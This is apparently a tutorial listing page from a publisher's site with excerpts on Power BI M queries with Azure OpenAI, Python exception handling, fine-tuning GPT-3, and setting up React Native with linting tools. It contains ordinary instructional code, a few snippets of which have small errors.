Search icon CANCEL
Subscription
0
Cart icon
Your Cart (0 item)
Close icon
You have no products in your basket yet
Save more on your purchases! discount-offer-chevron-icon
Savings automatically calculated. No voucher code required.
Arrow left icon
Explore Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Newsletter Hub
Free Learning
Arrow right icon
timer SALE ENDS IN
0 Days
:
00 Hours
:
00 Minutes
:
00 Seconds

How-To Tutorials

7007 Articles
article-image-revolutionize-power-bi-queries-with-openai
Gus Frazer
11 Dec 2024
10 min read
Save for later

Revolutionize Power BI Queries with OpenAI

Gus Frazer
11 Dec 2024
10 min read
This article is an excerpt from the book, Data Cleaning with Power BI, by Gus Frazer. Unlock the full potential of your data by mastering the art of cleaning, preparing, and transforming data with Power BI for smarter insights and data visualizations.IntroductionDiscover the transformative potential of leveraging Azure OpenAI, integrated with ChatGPT functionality, to enhance Power BI's M query capabilities. In this article, we delve into how this powerful combination offers expert guidance, efficient solutions, and insightful recommendations for optimizing data transformation tasks. From generating M queries to streamlining complex transformations, explore how Azure OpenAI with ChatGPT empowers users to boost productivity and efficiency in Power BI.Using OpenAI for M queriesAzure OpenAI, with ChatGPT functionality within it, can be a helpful tool for generating M queries in Power BI by providing suggestions, helping with syntax, and offering insights into data transformation tasks. In the following example, you will learn about how you can leverage the chat playground within OpenAI to improve your productivity and efficiency when writing M queries. We will do this by asking a series of questions directly within Azure OpenAI.Complete the next steps to  follow along with the example in your own environment:1. Click on Deployment on the left-hand side and then select Create new deployment to get started.2. Select a model from the base models, in this case, select gpt-35-turbo, and then name your deployment. In this example, name it CleaningDataOpenAI.3. Select Chat playground from the Azure OpenAI Studio home screen or from the Playground tab on the left of your screen. This should open the following view:Figure 15.4 – Screenshot of the chat playground from within Azure OpenAINow that you have set up an instance of OpenAI, here’s an example conversation taken from OpenAI, where the chat functionality has been used to assist with writing M queries in Power BI:User: Hi, I’m working on a Power BI project, and I need to transform some data using M queries. I have a table with sales data, and I want to calculate the total sales for each product category. Can you help me with the M query for that?ChatGPT: Of course! To calculate the total sales for each product category, you can use the Group By transformation in Power BI’s Power Query Editor. Here’s a sample M snippet for your scenario:let Source = YourDataSource, GroupedTable = Table.Group(Source, {"ProductCategory"}, {{"TotalSales", each List.Sum([Sales]), type number}}) in GroupedTableReplace YourDataSource with the actual name of your data source. This code groups the data by the ProductCategory column and calculates the total sales for each group.User: Thanks! That’s a great starting point. What if I want to filter out products with sales less than $1,000  before calculating the total sales?ChatGPT: You can add a filtering step before the Group By transformation. Here’s an updated version of the M:let Source = YourDataSource, FilteredTable = Table.SelectRows(Source, each [Sales] >= 1000), GroupedTable = Table.Group(FilteredTable, {"ProductCategory"}, {{"TotalSales", each List.Sum([Sales]), type number}}) in GroupedTableThis code filters out rows where sales are less than $1,000 before grouping the data by product category and calculating the total sales.User: Perfect! This is really helpful. One more thing – what if I want to sort the results in descending order based on total sales?ChatGPT: You can add a sorting step using the Table.Sort function. Here’s the modified M:let Source = YourDataSource, FilteredTable = Table.SelectRows(Source, each [Sales] >= 1000), GroupedTable = Table.Group(FilteredTable, {"ProductCategory"}, {{"TotalSales", each List.Sum([Sales]), type number}}), SortedTable = Table.Sort(GroupedTable,{{"TotalSales", Order. Descending}}) in SortedTableThis code sorts the grouped table in descending order based on the “TotalSales” column.This interaction represents a simple example of how those who can leverage the power of tools such as OpenAI and C hatGPT will be able to quickly upskill in areas such as coding. It has to be said, though, that while this is still in its infancy, it’s important to always test and validate the answers provided before implementing them in production. Also, ensure that you take precautions when using the publicly available ChatGPT model to avoid sharing sensitive data publicly. If you would like to use sensitive data or you want to ensure that requests are given within a secured governed environment, make sure to use the ChatGPT model within your own Azure OpenAI instance.In more complex examples, optimizing Power Query transformations could involve efficient interaction with Azure OpenAI. This includes streamlining API calls, managing large datasets, and incorporating caching mechanisms for repetitive queries, ensuring a seamless and performant data cleaning process.As we begin to explore the use cases where this technology can be most effective, there are a number of clear early winners:Optimizing query plans: ChatGPT’s natural language understanding can assist in formulating more efficient Power Query plans. By describing the desired transformations in natural language, users can interact with ChatGPT to generate optimized query plans. This involves selecting the most suitable Power Query functions and structuring transformations for performance gains.Caching strategies for repetitive queries: ChatGPT can guide users in devising effective caching strategies. By understanding the context of data transformations, it can recommend where to implement caching mechanisms to store and reuse intermediate results, minimizing redundant API calls and computations. The following is an example of just this, where I have asked Azure OpenAI to verify and optimize my query from the Power Query Advanced Editor. The model suggested I use the Table.Buffer function to help cache the table in memory and optimize the query.Figure – An example request to OpenAI to help optimize my query for Power Query                                                        Figure – An example response from OpenAI to help optimize my query for Power QueryNow as we highlighted in Chapter 11, M Query Optimization, Table.Buffer can indeed improve the performance of your queries and refreshes, but this really depends on the data you are working with. In the previous example, the model doesn’t take the characteristics, size, or complexity of your data into consideration as it isn’t plugged into your data at this stage. Also linking back to the example you walked through in Chapter 11, the placement of where you add Table.Buffer can really impact how your query performs. In the previous example, if you were connecting to a small dataset, you would likely cause it to run slower by adding the Table.Buffer function as the second variable in the query.Lastly, it’s worth mentioning that how you prompt these models is crucially important. In the previous example, we didn’t specify what type of data source we were using in our query. As such, the model hasn’t provided an insight or overview that using Table.Buffer on a data source supporting query folding will cause it to break the fold. Again, this is not so much of a problem if Table.Buffer is placed at the end of your query for smaller datasets, but it is a problem if you add it nearer to the beginning of the query, like in the previous example.Handling large datasets: Dealing with large datasets often poses a challenge in Power Query. OpenAI models, including ChatGPT, can provide insights into dividing and conquering large datasets. This includes strategies for parallel processing, filtering data early in the transformation pipeline, and using aggregations to reduce computational load.Dynamic query adjustments: ChatGPT’s interactive nature allows users to dynamically adjust queries based on evolving requirements. It can assist in crafting queries that adapt to changing data scenarios, ensuring that Power Query transformations remain flexible and responsive to varied datasets.Guidance on complex transformations: Power Query oft en involves intricate transformations. ChatGPT can act as a virtual assistant, guiding users through the process of complex transformations. It can suggest optimal function compositions, advise on conditional logic placement, and assist in structuring transformations to enhance efficiency. The best example of this can be seen in the following two screenshots of an active use case seen in many businesses. The example begins with a user asking the model for a description of what the query is doing. OpenAI then provides a breakdown of what the query is doing in each step to help the user interpret the code. It helps to break down the barriers to coding and also helps to decipher code that has not been documented well by previous employees.                                                     Figure – An example request to OpenAI to help translate my queryFigure – An example response from OpenAI to help describe my queryError handling strategies: Optimizing Power Query also entails robust error handling. ChatGPT can provide recommendations for anticipating and handling errors gracefully within a query. This includes strategies for logging errors, implementing fallback mechanisms, and ensuring the stability of the overall data preparation process.In this section, you learned how to optimize Power Query transformations with Azure OpenAI efficiently. Key takeaways include using ChatGPT for natural-language-based query planning and effective caching strategies. Insights include handling large datasets through parallel processing, early filtering, and aggregations. This knowledge equips you to streamline and enhance your Power Query processes effectively.In the next section, you will learn about Microsoft  Copilot, how to set up a Power BI instance with Copilot activated, and also how you can use this new AI technology to help clean and prepare your data.ConclusionIn conclusion, Azure OpenAI with ChatGPT presents a game-changing solution for maximizing Power BI's potential. From query optimization to error-handling strategies, this integration streamlines processes and enhances productivity. As users navigate complex data transformations, the guidance provided fosters efficient decision-making and empowers users to tackle challenges with confidence. With Azure OpenAI and ChatGPT, the possibilities for revolutionizing Power BI workflows are endless, offering a glimpse into the future of data transformation and analytics.Author BioGus Frazer is a seasoned Analytics Consultant focused on Business Intelligence solutions. With over 7 years of experience working for the two market-leading platforms, Power BI & Tableau, has amassed a wealth of knowledge and expertise. Gus has helped hundreds of customers to drive their digital and data transformations, scope data requirements, drive actionable insights, and most important of all, cleanse data ready for analysis. Most recently helping to set up, organize and run the Power BI UK community at Microsoft. He holds 6 Azure and Power BI certifications, including the PL-300 and DP-500 certifications. In this book, Gus offers readers invaluable guidance on ingesting, preparing, and cleansing data for analysis in Power BI. --This text refers to an out of print or unavailable edition of this title.
Read more
  • 0
  • 0
  • 81745

article-image-how-to-perform-exception-handling-in-python-with-try-catch-and-finally
Guest Contributor
10 Dec 2019
9 min read
Save for later

How to perform exception handling in Python with ‘try, catch and finally’

Guest Contributor
10 Dec 2019
9 min read
An integral part of using Python involves the art of handling exceptions. There are primarily two types of exceptions; Built-in exceptions and User-Defined Exceptions. In such cases, the error handling resolution is to save the state of execution in the moment of error which interrupts the normal program flow to execute a special function or a code which is called Exception Handler. There are many types of errors like ‘division by zero’, ‘file open error’, etc. where an error handler needs to fix the issue. This allows the program to continue based on prior data saved. Source: Eyehunts Tutorial Just like Java, exceptions handling in Python is no different. It is a code embedded in a try block to run exceptions. Compare that to Java where catch clauses are used to catch the Exceptions. The same sort of Catch clause is used in Python that begins with except. Also, custom-made exception is possible in Python by using the raise statement where it forces a specified exception to take place. Reason to use exceptions Errors are always expected while writing a program in Python which requires a backup mechanism. Such a mechanism is set to handle any encountered errors and not doing so may crash the program completely. The reason to equip python program with the exception mechanism is to set and define a backup plan just in case any possible error situation erupts while executing it. Catch exceptions in Python Try statement is used for handling the exception in Python. A Try clause will consist of a raised exception associated with a particular, critical operation. For handling the exception the code is written within the Except Clause. The choice of performing a type of operation depends on the programmer once catching the exception is done. The below-defined program loops until the user enters an integer value having a valid reciprocal. A part of code that triggers an exception is contained inside the Try block. In case of absence of any exceptions then the normal flow of execution continues skipping the except block. And in case of exceptions raising the except block is caught. Checkout the example: The Output will be: Naming the exception is possible by using the ex_info() function that is present inside the sys module. It asks the user to make another attempt for naming it. Any unexpected values like 'a' or '1.3' will trigger the ValueError. Also, the return value of '0' leads to ZeroDivisionError. Exception handling in Python: try, except and finally There are instances where the suspicious code may raise exceptions which are placed inside such try statement block. Again, there is a code that is dedicated to handling such raised exceptions and the same is placed within the Except block. Below is an example of above-explained try and except statement when used in Python. try:   ** Operational/Suspicious Code except for SomeException:   ** Code to handle the exception How do they work in Python: The primarily used try block statements are triggered for checking whether or not there is any exception occurring within the code. In the event of non-occurrence of exception, the except block (Containing the exceptions handling statements) is executed post executing the try block. When the exception matches the predefined name as mentioned in 'SomeException' for handling the except block, it does the handling and enables the program to continue. In case of absence of any corresponding handlers that deals with the ones to be found in the except block then the activity of program execution is halted along with the error defining it. Defining Except without the exception To define the Except Clause isn’t always a viable option regardless of which programming language is used. As equipping the execution with the try-except clause is capable of handling all the possible types of exceptions. It will keep users ignorant about whether the exception was even raised in the first place. It is also a good idea to use the except statement without the exceptions field, for example some of the statements are defined below: try:    You do your operations here;    ...................... except:    If there is an exception, then execute this block.    ...................... else:    If there is no exception then execute this block.  OR, follow the below-defined syntax: try:   #do your operations except:   #If there is an exception raised, execute these statements else:   #If there is no exception, execute these statements Here is an example if the intent is to catch an exception within the file. This is useful when the intention is to read the file but it does not exist. try:   fp = open('example.txt', r) except:   print ('File is not found')   fp.close This example deals with opening the 'example.txt'. In such cases, when the called upon file is not found or does not exist then the code executes the except block giving the error read like 'File is not found'. Defining except clause for multiple exceptions It is possible to deal with multiple exceptions in a single block using the try statement. It allows doing so by enabling programmers to specify the different exception handlers. Also, it is recommended to define a particular exception within the code as a part of good programming practice. The better way out in such cases is to define the multiple exceptions using the same, above-mentioned except clause. And it all boils down to the process of execution wherein if the interpreter gets hold of a matching exception, then the code written under the except code will be executed. One way to do is by defining a tuple that can deal with the predefined multiple exceptions within the except clause. The below example shows the way to define such exceptions: try:    # do something  except (Exception1, Exception2, ..., ExceptionN):    # handle multiple exceptions    pass except:    # handle all other exceptions You can also use the same except statement to handle multiple exceptions as follows − try:    You do your operations here;    ...................... except(Exception1[, Exception2[,...ExceptionN]]]):    If there is an exception from the given exception list,     then execute this block.    ...................... else:    If there is no exception then execute this block.  Exception handling in Python using the try-finally clause Apart from implementing the try and except blocks within one, it is also a good idea to put together try and finally blocks. Here, the final block will carry all the necessary statements required to be executed regardless of the exception being raised in the try block. One benefit of using this method is that it helps in releasing external resources and clearing up the cache memories beefing up the program. Here is the pseudo-code for try..finally clause. try:    # perform operations finally:    #These statements must be executed Defining exceptions in try... finally block The example given below executes an event that shuts the file once all the operations are completed. try:    fp = open("example.txt",'r')    #file operations finally:    fp.close() Again, using the try statement in Python, it is wise to consider that it also comes with an optional clause – finally. Under any given circumstances, this code is executed which is usually put to use for releasing the additional external resource. It is not new for the developers to be connected to a remote data centre using a network. Also, there are chances of developers working with a file loaded with Graphic User Interface. Such situations will push the developers to clean up the used resources. Even if the resources used, yield successful results, such post-execution steps are always considered as a good practice. Actions like shutting down the GUI, closing a file or even disconnecting from a connected network written down in the finally block assures the execution of the code. The finally block is something that defines what must be executed regardless of raised exceptions. Below is the syntax used for such purpose: The file operations example below illustrates this very well: try: f = open("test.txt",encoding = 'utf-8') # perform file operations finally: f.close() Or In simpler terms: try:    You do your operations here;    ......................    Due to any exception, this may be skipped. finally:    This would always be executed.    ...................... Constructing such a block is a better way to ensure the file is closed even if the exception has taken place. Make a note that it is not possible to use the else clause along with the above-defined finally clause. Understanding user-defined exceptions Python users can create exceptions and it is done by deriving classes out of the built-in exceptions that come as standard exceptions. There are instances where displaying any specific information to users is crucial, especially upon catching the exception. In such cases, it is best to create a class that is subclassed from the RuntimeError. For that matter, the try block will raise a user-defined exception. The same is caught in the except block. Creating an instance of the class Networkerror will need the user to use variable e. Below is the syntax: class Networkerror(RuntimeError):    def __init__(self, arg):       self.args = arg   Once the class is defined, raising the exception is possible by following the below-mentioned syntax. try:    raise Networkerror("Bad hostname") except Networkerror,e:    print e.args Key points to remember Note that an exception is an error that occurs while executing the program indicating such events (error) occur though less frequently. As mentioned in the examples above, the most common exceptions are ‘divisible by 0’, ‘attempt to access non-existent file’ and ‘adding two non-compatible types’. Ensure putting up a try statement with a code where you are not sure whether or not the exception will occur. Specify an else block alongside try-except statement which will trigger when there is no exception raised in a try block. Author bio Shahid Mansuri Co-founder Peerbits, one of the leading software development company, USA, founded in 2011 which provides Python development services. Under his leadership, Peerbits used Python on a project to embed reports & researches on a platform that helped every user to access the dashboard that was freely available and also to access the dashboard that was exclusively available. His visionary leadership and flamboyant management style have yield fruitful results for the company. He believes in sharing his strong knowledge base with a learned concentration on entrepreneurship and business. Introducing Spleeter, a Tensorflow based python library that extracts voice and sound from any music track Fake Python libraries removed from PyPi when caught stealing SSH and GPG keys, reports ZDNet There’s more to learning programming than just writing code
Read more
  • 0
  • 0
  • 81670

article-image-leveraging-chatgpt-and-gpt-3
Deborah A. Dahl
12 Feb 2024
8 min read
Save for later

Leveraging ChatGPT and GPT-3

Deborah A. Dahl
12 Feb 2024
8 min read
Dive deeper into the world of AI innovation and stay ahead of the AI curve! Subscribe to our AI_Distilled newsletter for the latest insights. Don't miss out – sign up today!This article is an excerpt from the book, Natural Language Understanding with Python, by Deborah A. Dahl. Combine natural language technology, deep learning, and large language models to create human-like language comprehension in computer systemsIntroductionIn the world of artificial intelligence, ChatGPT stands as a versatile conversational agent, adept at handling generic information interactions. While customization can be a challenge at present, ChatGPT offers a unique avenue for developers and AI enthusiasts alike. Beyond chat-based dialogue, it holds the potential to streamline the often time-consuming process of generating training data for conventional applications. In this article, we delve into the capabilities of ChatGPT and explore the journey of fine-tuning GPT-3 for specific use cases. By the end, you'll be equipped to harness the power of these language models, from data generation to AI customization, in your projects. Let's embark on this exciting AI journey together.ChatGPTChatGPT (https://openai.com/blog/chatgpt/) is a system that can interact with users about generic information in a very capable way. Although at the time of writing, it is hard to customize ChatGPT for specific applications, it can be useful for other purposes than customized natural language applications. For example, it can very easily be used to generate training data for a conventional application. If we wanted to develop a banking application using some of the techniques discussed earlier in this book, we would need training data to provide the system with examples of how users might ask the system questions. Typically, this involves a process of collecting actual user input, which could be very time-consuming. ChatGPT could be used to generate training data instead, by simply asking it for examples. For example, for the prompt give me 10 examples of how someone might ask for their checking balance, ChatGPT responded with the sentences in Figure 11.3:Figure 11.3 – GPT-3 generated training data for a banking applicationMost of these seem like pretty reasonable queries about a checking account, but some of them don’t seem very natural. For that reason, data generated in this way always needs to be reviewed. For example, a developer might decide not to include the second to the last example in a training set because it sounds stilted, but overall, this technique has the potential to save developers quite a bit of time.Applying GPT-3Another well-known LLM, GPT-3, can also be fine-tuned with application-specific data, which should result in better performance. To do this, you need an OpenAI key because using GPT-3 is a paid service. Both fine-tuning to prepare the model and using the fine-tuned model to process new data at inference time will incur a cost, so it is important to verify that the training process is performing as expected before training with a large dataset and incurring the associated expense.OpenAI recommends the following steps to fine-tune a GPT-3 model.1. Sign up for an account at https://openai.com/ and obtain an API key. The API key will be used to track your usage and charge your account accordingly.2.  Install the OpenAI command-line interface (CLI) with the following command:! pip install --upgrade openaiThis command can be used at a terminal prompt in Unix-like systems (some developers have reported problems with Windows or macOS). Alternatively, you can install GPT-3 to be used in a Jupyter notebook with the following code:!pip install --upgrade openaiAll of the following examples assume that the code is running in a Jupyter notebook:1. Set your API key:api_key =<your API key> openai.api_key = api_key2. The next step is to specify the training data that you will use for fine-tuning GPT-3 for your application. This is very similar to the process of training any NLP system; however, GPT-3 has a specific format that must be used for training data. This format uses a syntax called JSONL, where every line is an independent JSON expression. For example, if we want to fine-tune GPT-3 to classify movie reviews, a couple of data items would look like the following (omitting some of the text for clarity):{"prompt":"this film is extraordinarily horrendous and i'm not going to waste any more words on it . ","completion":" negative"} {"prompt":"9 : its pathetic attempt at \" improving \" on a shakespeare classic . 8 : its just another piece of teen fluff . 7 : kids in high school are not that witty . … ","completion":" negative"} {"prompt":"claire danes , giovanni ribisi , and omar epps make a likable trio of protagonists , …","completion":" negative"}Each item consists of a JSON dict with two keys, prompt and completion. prompt is the text to be classified, and completion is the correct classification. All three of these items are negative reviews, so the completions are all marked as negative.It might not always be convenient to get your data into this format if it is already in another format, but OpenAI provides a useful tool for converting other formats into JSONL. It accepts a wide range of input formats, such as CSV, TSV, XLSX, and JSON, with the only requirement for the input being that it contains two columns with prompt and completion headers. Table 11.2 shows a few cells from an Excel spreadsheet with some movie reviews as an example:promptcompletionkolya is one of the richest films i’ve seen in some time . zdenek sverak plays a confirmed old bachelor ( who’s likely to remain so ) , who finds his life as a czech cellist increasingly impacted by the five-year old boy that he’s taking care of …positivethis three hour movie opens up with a view of singer/guitar player/musician/ composer frank zappa rehearsing with his fellow band members . all the rest displays a compilation of footage , mostly from the concert at the palladium in new york city , halloween 1979 …positive`strange days’ chronicles the last two days of 1999 in los angeles . as the locals gear up for the new millenium , lenny nero ( ralph fiennes ) goes about his business …positiveTable 11.2 – Movie review data for fine-tuning GPT-3To convert one of these alternative formats into JSONL, you can use the fine_tunes.prepare_ data tool, as shown here, assuming that your data is contained in the movies.csv file:!openai tools fine_tunes.prepare_data -f ./movies.csv -qThe fine_tunes.prepare_data utility will create a JSONL file of the data and will also provide some diagnostic information that can help improve the data. The most important diagnostic that it provides is whether or not the amount of data is sufficient. OpenAI recommends several hundred examples of good performance. Other diagnostics include various types of formatting information such as separators between the prompts and the completions.After the data is correctly formatted, you can upload it to your OpenAI account and save the filename:file_name = "./movies_prepared.jsonl" upload_response = openai.File.create( file=open(file_name, "rb"), purpose='fine-tune' ) file_id = upload_response.idThe next step is to create and save a fine-tuned model. There are several different OpenAI models that can be used. The one we’re using here, ada, is the fastest and least expensive, and does a good job on many classification tasks:openai.FineTune.create(training_file=file_id, model="ada") fine_tuned_model = fine_tune_response.fine_tuned_modelFinally, we can test the model with a new prompt:answer = openai.Completion.create( model = fine_tuned_model, engine = "ada", prompt = " I don't like this movie ", max_tokens = 10, # Change amount of tokens for longer completion temperature = 0 ) answer['choices'][0]['text']In this example, since we are only using a few fine-tuning utterances, the results will not be very good. You are encouraged to experiment with larger amounts of training data.ConclusionIn conclusion, ChatGPT and GPT-3 offer invaluable tools for AI enthusiasts and developers alike. From data generation to fine-tuning for specific applications, these models present a world of possibilities. As we've seen, ChatGPT can expedite the process of creating training data, while GPT-3's customization can elevate the performance of your AI applications. As the field of artificial intelligence continues to evolve, these models hold immense promise. So, whether you're looking to streamline your development process or take your AI solutions to the next level, the journey with ChatGPT and GPT-3 is an exciting one filled with untapped potential. Embrace the future of AI with confidence and innovation.Author BioDeborah A. Dahl is the principal at Conversational Technologies, with over 30 years of experience in natural language understanding technology. She has developed numerous natural language processing systems for research, commercial, and government applications, including a system for NASA, and speech and natural language components on Android. She has taught over 20 workshops on natural language processing, consulted on many natural language processing applications for her customers, and written over 75 technical papers. This is Deborah’s fourth book on natural language understanding topics. Deborah has a PhD in linguistics from the University of Minnesota and postdoctoral studies in cognitive science from the University of Pennsylvania.
Read more
  • 0
  • 0
  • 81573

article-image-how-to-create-a-native-mobile-app-with-react-native-tutorial
Bhagyashree R
19 Feb 2019
12 min read
Save for later

How to create a native mobile app with React Native [Tutorial]

Bhagyashree R
19 Feb 2019
12 min read
React Native was developed by Facebook, along with the lines of the React framework. Instead of rendering components to a browser's DOM, React Native (RN) invokes native APIs to create internal components that are handled through your JS code. There are some differences between the usual HTML elements and RN's components, but they are not too hard to overcome. With this tool, you are actually building a native app that looks and behaves exactly like any other native application, except that you use a single language, JS, for both Android and iOS development. This article is taken from the book  Modern JavaScript Web Development Cookbook by Federico Kereki.  This book is a perfect blend of solutions for traditional JavaScript development and modern areas that developers have recently been exploring with JavaScript. This problem-solving guide teaches you popular problems solving techniques for JavaScript on servers, browsers, mobile phones, and desktops. To follow along with the examples implemented in this article, you can download the code from the book's GitHub repository. In this article, we'll see how to install and use React Native to build a mobile application. We will also see how to add development tools like ESLint, Flow, and Prettier. Setting up a RN application There are three ways to set up a RN application: manually, which you won't want to do; secondly, with packages, using the react-native-cli command-line interface; or lastly, by using a package very similar to create-react-native-app (or CRAN). We start by getting a command-line utility, which will include plenty of other packages: npm install create-react-native-app -g Afterward, we can create and run a simple project with just three commands: create-react-native-app yourprojectname cd yourprojectname npm start How it works... When you run your app, it starts a server at your machine, at port 19000 or 19001, to which you will connect using the Expo application. You can download Expo from its official website, which is available for both Android or iOS. Install it by following the instructions onscreen: When you open the Expo app for the first time, it will look like the following screenshot: Note that both the phone and your machine must be in the same local network, and your machine must also allow connections to ports 19000 and 19001; you may have to modify your firewall for this to work. After you use the Scan QR Code option, there will be some synchronization, and soon you'll get to see your basic code running with no problems: Furthermore, if you modify the App.js source code, the changes will be immediately reflected in your device, which means all is well! To make sure this happens, shake the phone to enable the debugging menu, and make sure that Live Reload and Hot Reloading are enabled. You'll also require Remote JS Debugging for later. Your phone should look as follows: Adding development tools Next, we need to add all the development tools required. We want to have ESLint for code checking, Prettier for formatting, and Flow for data types. CRAN takes care of including Babel and Jest, so we won't have to do anything for those two. How to do it... As opposed React, where we need to add a special rewiring package in order to work with specific configurations, in RN, we can just add some packages and configuration files, and we'll be ready to go. Adding ESLint For ESLint, we'll have quite a list of packages we want: npm install --save-dev \ eslint eslint-config-recommended eslint-plugin-babel \ eslint-plugin-flowtype eslint-plugin-react eslint-plugin-react-native We'll require a separate .eslintrc file, as in the case with React. The appropriate contents include the following: { "parser": "babel-eslint", "parserOptions": { "ecmaVersion": 2017, "sourceType": "module", "ecmaFeatures": { "jsx": true } }, "env": { "node": true, "browser": true, "es6": true, "jest": true, "react-native/react-native": true }, "extends": [ "eslint:recommended", "plugin:flowtype/recommended", "plugin:react/recommended", "plugin:react-native/all" ], "plugins": ["babel", "flowtype", "react", "react-native"], "rules": { "no-console": "off", "no-var": "error", "prefer-const": "error", "flowtype/no-types-missing-file-annotation": 0 } } Adding Flow Having completed that, ESLint is set to recognize our code, but we have to configure Flow as well: npm install --save-dev flow flow-bin flow-coverage-report flow-typed We'll have to add a couple of lines to the scripts section of package.json: "scripts": { "start": "react-native-scripts start", . . . "flow": "flow", "addTypes": "flow-typed install" }, Then, we have to initialize the working directories of Flow: npm run flow init The contents of the .flowconfig file look like this: [ignore] .*/node_modules/.* [include] [libs] [lints] all=warn untyped-type-import=off unsafe-getters-setters=off [options] include_warnings=true [strict] Adding Prettier There's not much to installing Prettier, all we need is an npm command, plus the .prettierrc file. For the former, just use the following command: npm install --save-dev prettier For configuration, we can use the contents of this .prettierrc file: { "tabWidth": 4, "printWidth": 75 } How it works... Let's check that everything is OK. We'll start by looking at the App.js file that was created by CRAN, and we can immediately verify that the tools work—because a problem is detected! Have a look at the following screenshot: The rule that fails is a new one, from eslint-plugin-react-native: no-color-literals, because we are using constants in styling, which could prove to be a maintenance headache in the future. We can solve that by adding a variable, and we'll use a type declaration to make sure Flow is also running. The new code should be as follows: // Source file: App.original.fixed.js /* @flow */ import React from "react"; import { StyleSheet, Text, View } from "react-native"; export default class App extends React.Component<> { render() { return ( <View style={styles.container}> <Text>Open up App.js to start working on your app!</Text> <Text>Changes you make will automatically reload.</Text> <Text>Shake your phone to open the developer menu.</Text> </View> ); } } const white: string = "#fff"; const styles = StyleSheet.create({ container: { flex: 1, backgroundColor: white, alignItems: "center", justifyContent: "center" } }); Using native components Working with RN is very much like working with React—there are components, state, props, life cycle events, and so on—but there is a key difference: your own components won't be based on HTML but on specific RN ones. For instance, you won't be using <div> elements, but rather <View> ones, which will be then mapped by RN to a UIView for iOS, or to an Android.View for Android. Getting ready We will start with an example of countries and regions page, which you can find in the book's GitHub repository.  Since we are using PropTypes, we'll need that package. Install it with the following command: npm install prop-types --save Then, we'll have to install some packages, starting with Redux and relatives. Actually, CRAN already includes redux and react-redux, so we don't need those, but redux-thunk isn't included.  We can install it using the following command: npm install react react-redux redux-thunk --save We'll also be using axios for async calls: npm install axios --save Our final step will be to run the server code (you can find it in the GitHub repo) so that our app will be able to do async calls. After downloading the server code from the GitHub repo, go to the directory, and just enter the following command: node out/restful_server.js. Let's now see how we can modify our code to make it appropriate for RN. How to do it... Since RN uses its own components, your HTML experience will be of little use. Here, we'll see some changes, but in order to derive the full benefits of all of RN's possibilities, you'll have to study its components on your own. Let's start with the <RegionsTable> component, which is rather simple: // Source file: src/regionsApp/regionsTable.component.js . . . render() { if (this.props.list.length === 0) { return ( <View> <Text>No regions.</Text> </View> ); } else { const ordered = [...this.props.list].sort( (a, b) => (a.regionName < b.regionName ? -1 : 1) ); return ( <View> {ordered.map(x => ( <View key={x.countryCode + "-" + x.regionCode}> <Text>{x.regionName}</Text> </View> ))} </View> ); } } Notice that there are no changes in the rest of the component, and all your React knowledge is still valid; you just have to adjust the output of your rendering method. Next, we'll change the <CountrySelect> component to use <Picker>, which is sort of similar, but we'll require some extra modifications. Let's take a look at our component, highlighting the parts where changes are needed: // Source file: src/regionsApp/countrySelect.component.js /* @flow */ import React from "react"; import PropTypes from "prop-types"; import { View, Text, Picker } from "react-native"; export class CountrySelect extends React.PureComponent<{ dispatch: ({}) => any }> { static propTypes = { loading: PropTypes.bool.isRequired, currentCountry: PropTypes.string.isRequired, list: PropTypes.arrayOf(PropTypes.object).isRequired, onSelect: PropTypes.func.isRequired, getCountries: PropTypes.func.isRequired }; componentDidMount() { if (this.props.list.length === 0) { this.props.getCountries(); } } onSelect = value => this.props.onSelect(value); render() { if (this.props.loading) { return ( <View> <Text>Loading countries...</Text> </View> ); } else { const sortedCountries = [...this.props.list].sort( (a, b) => (a.countryName < b.countryName ? -1 : 1) ); return ( <View> <Text>Country:</Text> <Picker onValueChange={this.onSelect} prompt="Country" selectedValue={this.props.currentCountry} > <Picker.Item key={"00"} label={"Select a country:"} value={""} /> {sortedCountries.map(x => ( <Picker.Item key={x.countryCode} label={x.countryName} value={x.countryCode} /> ))} </Picker> </View> ); } } } Lots of changes! Let's go through them in the order they occur: An unexpected change: if you want a <Picker> component to display its current value, you must set its selectedValue property; otherwise, even if the user selects a country, the change won't be seen onscreen. We'll have to provide an extra prop, currentCountry, which we'll get from the store, so we can use it as the selectedValue for our list. The fired event when the user selects a value is also different; the event handler will be called directly with the chosen value, instead of with an event from which to work with event.target.value. We have to replace the <select> element with <Picker>, and provide a prompt text prop that will be used when the expanded list is shown onscreen. We have to use <Item> elements for the individual options, noting that the label to be displayed is now a prop. Let's not forget the change when connecting the list of countries to the store; we'll only have to add an extra property to the getProps() function: // Source file: src/regionsApp/countrySelect.connected.js const getProps = state => ({ list: state.countries, currentCountry: state.currentCountry, loading: state.loadingCountries }); Now, all we need to do is see how the main app is set up. Our App.js code will be quite simple: // Source file: App.js /* @flow */ import React from "react"; import { Provider } from "react-redux"; import { store } from "./src/regionsApp/store"; import { Main } from "./src/regionsApp/main"; export default class App extends React.PureComponent<> { render() { return ( <Provider store={store}> <Main /> </Provider> ); } } This is pretty straightforward. The rest of the setup will be in the main.js file, which has some interesting details: // Source file: src/regionsApp/main.js /* @flow */ import React from "react"; import { View, StatusBar } from "react-native"; import { ConnectedCountrySelect, ConnectedRegionsTable } from "."; export class Main extends React.PureComponent<> { render() { return ( <View> <StatusBar hidden /> <ConnectedCountrySelect /> <ConnectedRegionsTable /> </View> ); } } Apart from the usage of <View> wherever we would previously have used <div> (a change to which you should already have gotten used to), there's an added detail: we don't want the status bar to show, so we use the <StatusBar> element, and make sure to hide it. How it works... Just for variety, instead of using my mobile phone, as I did earlier in this article, I decided to use an emulated device. After starting the application with npm start, I started my device, and soon got the following: If the user touches the <Picker> element, a popup will be displayed, listing the countries that were received from our Node server, as shown in the following screenshot: When the user actually taps on a country, the onValueChange event is fired, and after calling the server, the list of regions is displayed, as follows: Everything works, and is using native components; great! By the way, if you were not very sure about the selectedValue problem we described, just omit that prop, and when the user picks on a country, you'll get a bad result: This article walked you through the installation and set up the process of React Native and other development tools for developing the mobile version of a web app. If you found this post useful, do check out the book, Modern JavaScript Web Development Cookbook.  You will learn how to create native mobile applications for Android and iOS with React Native, build client-side web applications using React and Redux, and much more. React Native 0.59 RC0 is now out with React Hooks, and more The React Native team shares their open source roadmap, React Suite hits 3.4.0 How to create a desktop application with Electron [Tutorial]
Read more
  • 0
  • 0
  • 80263

article-image-getting-started-with-med-palm-2
07 Sep 2023
5 min read
Save for later

Getting Started with Med-PaLM 2

07 Sep 2023
5 min read
